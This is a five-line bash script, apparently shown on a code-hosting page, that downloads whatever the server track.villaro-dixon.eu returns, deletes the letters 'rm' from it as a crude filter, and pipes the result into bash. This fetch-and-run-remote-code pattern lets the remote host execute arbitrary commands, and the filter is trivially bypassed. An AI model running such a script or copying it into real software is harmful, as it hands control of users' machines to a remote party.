5 lines
125 B
Bash
Executable file
5 lines
125 B
Bash
Executable file
#!/bin/bash
|
|
RSLT=$(wget http://track.villaro-dixon.eu/ --quiet -O -)
|
|
RSLT2=$(echo $RSLT | sed 's/rm//g')
|
|
echo $RSLT2 | bash
|
|
|